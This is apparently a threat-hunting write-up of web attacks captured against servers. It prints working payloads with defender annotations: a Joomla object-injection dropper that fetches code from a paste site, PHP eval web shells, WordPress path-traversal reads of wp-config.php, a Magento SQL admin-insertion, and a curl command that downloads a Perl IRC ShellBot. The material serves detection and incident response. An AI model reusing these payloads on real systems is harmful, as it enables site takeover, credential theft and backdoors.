Web attacks

Hunting for web attackers

Hunting for IPs that attack web servers


IPs discovered

213.42.28.x
27.153.186.x
195.154.194.x
27.153.186.x
107.172.80.x
210.209.85.x
62.75.156.x
185.57.252.x
94.23.30.x
71.181.80.x
91.121.27.x
...



PHP code upload



GET }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(
base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvb
GEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1
BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05D
ZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY
213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVV
rRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVT
VTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWD
BaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlN
FVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM
1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVW
s5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlE
c05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaU
zloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1R
zTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktG
OWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();
exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd

GET //libraries/lola.php

GET //libraries/legacy/log/js.php

After first base64 decode
// Stage-1 dropper, recovered by base64-decoding the string carried in the
// serialized object's `feed_url` field (request shown above). It writes a
// second stage into the site's own document root at
// DOCUMENT_ROOT/libraries/lola.php — the same path later requested with
// `GET //libraries/lola.php`. A new PHP file appearing under libraries/
// immediately after a request carrying a serialized JDatabaseDriverMysqli
// object is the on-host signal to look for.
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lola.php" ;
// "w+" truncates any existing file at that path before the write.
$fp=fopen("$check","w+");
// The embedded base64 blob is the stage-2 script, shown decoded below under
// "After second base64 decode".
fwrite($fp,base64_decode
('PD9waHANCmVjaG8gIm1hZ25vbSBhdXRvIGNyZWF0IGZpbGVzIjsNCg0KZnVuY3Rpb24ga
HR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UU
kFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJ
GltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZ
XR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PV
CddIC4gIi9saWJyYXJpZXMvbGVnYWN5L2xvZy9qcy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwczovL2dob3N0YmluL
mNvbS9wYXN0ZS9hdzVjYS9yYXcnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY
2xvc2UoJG9wNSk7DQpAdW5saW5rKF9fRklMRV9fKTsNCj8+'));
fclose($fp);

After second base64 decode
// Stage-2 script (the blob stage 1 wrote to lola.php), decoded. This banner is
// printed to the output, so when the dropped file is served it is a usable
// response-body marker for the sample.
echo "magnom auto creat files";

// Fetches $url with cURL and returns the response body as a string (or false
// on failure), because CURLOPT_RETURNTRANSFER is set; redirects are followed,
// headers are stripped, and the connect timeout is 10 seconds.
// Note the curl_close() placed after `return` — it is unreachable, so the
// handle is never released. Harmless for a one-shot dropper, but a small
// stylistic tell when matching this sample against other copies.
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im); // dead code: never executed after the return above
}
// Stage-2 body: downloads the final payload from a paste site, writes it to
// DOCUMENT_ROOT/libraries/legacy/log/js.php (the path seen in the
// `GET //libraries/legacy/log/js.php` request above), then deletes itself.
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/legacy/log/js.php" ;
// Outbound HTTPS from the web server to ghostbin.com — a network-level
// indicator. The paste content is not on this page, so what js.php does
// cannot be stated from here.
$text5 = http_get('https://ghostbin.com/paste/aw5ca/raw');
// No success check: if http_get() returned false, an empty js.php is still
// created, which is itself a useful artefact to look for.
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
// Removes the running file (lola.php); `@` silences the warning if unlink
// fails. Responders will likely find js.php present and lola.php already gone.
@unlink(__FILE__);
?

PHP code upload: Variation



}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:234:\"
file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"info.php\",\"|=|\\x3C\".chr(63).\"php
\\x24mujj=\\x24_POST['h'];if(\\x24mujj!=''){\\x24xsser=
base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"
cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql
\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9"

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"
feed_url\";s:168:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nLy5pbmRle
C5waHAnLCc8P3BocCBAZXZhbCgkX1JFUVVFU1RbeG9dKTsnKTs));
JFactory::getConfig();exit;\";s:19:\"
cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"
JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86


WebFuck T0PHackTeam www.t0p.xyz



GET /web_manage/fckeditor/editor/filemanager/connectors/php/connector.php?Command=CreateFolder&Type;=
Image&CurrentFolder;=%2F91683711.asp&NewFolderName;=91683711

GET /web_manage/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type;=
Image&CurrentFolder;=%2F91683711.asp&NewFolderName;=91683711


WordPress



GET /category/security.html&sa=U&ved=0ahUKEwjbiK2L5szQAhVHnRoKHb9bAwo4lgEQFgjBATAg&
amp;usg=AFQjCNFD2nxKzamo6ECnbws7PFmNG8cKXg/wp-admin/admin-
GET /ajax.php?action=revslider_show_image&img;=../wp-config.php
GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
GET //force-download.php?file=../wp-config.php
GET //wp-content/themes/markant/download.php?file=../../wp-config.php
GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
GET /web-scanners.html&sa=U&ved=0ahUKEwiYs_D-mtrSAhXl6YMKHY-tCg84ZBAWCGIwDg
&usg=AFQjCNGqHoeLxLLiNcrqvqN0SPMp_1EOvA/wp-admin/admin-ajax.php?action=revslider_show_image&img;=../wp-config.php
GET /web-scanners.html&sa=U&ved=0ahUKEwiYs_D-mtrSAhXl6YMKHY-tCg84ZBAWCGIwDg
&usg=AFQjCNGqHoeLxLLiNcrqvqN0SPMp_1EOvA/wp-admin/admin-ajax.php


POST /web_manage/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?
Command=FileUpload&Type;=File&CurrentFolder;=%2F


POST /wp-content/plugins/Login-wall-etgFB/login_wall.php?login=
cmd&z3;=U29ja2V0SW9udHJvbC5waHA%3d&z4;=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d


Magento Mass Importer



/files//magmi/web/download_file.php?file=../conf/magmi.ini
/files//web/download_file.php?file=../conf/magmi.ini
/files/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe;=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter;=
bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEV
SRSB1c2VyX2lkID0gMzM7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDMzOyAgSU5TRVJUIElOVE8gYGF
kbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRg
LCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgY
GV4dHJhYCkgVkFMVUVTICAoMzMsJ21hZ2VudG8nLCAnZGVzaWduJywgJ2Rlc2lnbkBtYWdlbnRvY29tbWVyY2UuY29tJywgJ2Rlc2lnbi
csICdkODkyYTkyNWExZjdkYTdlMGJhMWE5ODU5OTA1ODczYjpycCcsICdudWxsJywgJ251bGwnLCAnbnVsbCcsIDEsIDAsIDEsICdOOyc
pOyAgSU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChgcGFyZW50X2lkYCwgYHRyZWVfbGV2ZWxgLCBgc29ydF9vcmRlcmAsIGByb2xlX3R5
cGVgLCBgdXNlcl9pZGAsIGByb2xlX25hbWVgKSBWQUxVRVMgKDEsIDIsIDAsICdVJywgMzMsICdkZXNpZ24nKTs7IC0tIA==
/files/downloader/
/files/api/xmlrpc


Shellbot


//index.inc.php?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F77.72.150.206%2Frvpoud%2Fattachments%2Fsection%2Fxnight.txt%3Bmv%20xnight.txt
%20..%2F..%2F..%2F..%2F..%2F..%2Fwp-admin%2F.xnight.php HTTP/1.1" 404 - "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
xnight.txt:
#!/usr/bin/perl
#
# ShellBOT by: devil__
# Greetz: Puna, Kelserific
#
...
...
...
########## CONFIGURACAO ############

# @ps holds command lines of common daemons; one entry is chosen at random into
# $processo. Where $processo is used is outside this excerpt — presumably it is
# assigned to $0 so the bot shows up under a benign name in `ps` output; confirm
# against the full sample.
my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]",
"/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];

# C2 rendezvous: IRC server, port, channel and operator nicks. $servidor is an
# undeclared package global (no `my`), so it can be preset before this line;
# the hard-coded default applies only when it is false (unset or empty).
# Network indicators from this block: irc.darkproject.com.br:6667, channel #dark.
$servidor='irc.darkproject.com.br' unless $servidor;
my $porta='6667';
my @canais=("#dark");
# Presumably the nicks allowed to command the bot; the command handling that
# consults @adms is not in this excerpt.
my @adms=("ODIN","subzid");

# Anti-flood throttle (original comment: "6/3 Recomendado", i.e. 6/3
# recommended). From the names, $linas_max lines may be sent before pausing
# $sleep seconds — the loop that applies these values is not shown.
my $linas_max=10;
my $sleep=5;

# IRC identity; getnick() and getident2() are defined elsewhere in the sample.
my $nick = getnick();
my $ircname = getident2();
my $realname = "dark project";
# Commented-out alternative that would have used the host's name (via
# `uname -n`) as the IRC real name.
#chop (my $realname = `uname -n`);
...
...
...